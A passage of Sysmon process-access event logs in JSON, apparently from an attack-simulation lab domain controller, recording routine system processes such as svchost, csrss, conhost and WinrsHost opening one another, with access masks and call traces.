{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.404\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010631B1200}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.404","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010631B1200}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.404\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010631B1200}\r\nSourceProcessId: 3796\r\nSourceThreadId: 4948\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010EF1A1200}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.404","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010631B1200}","SourceProcessId":"3796","SourceThreadId":"4948","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010EF1A1200}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010EF1A1200}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010EF1A1200}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.419\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1660\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010EF1A1200}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 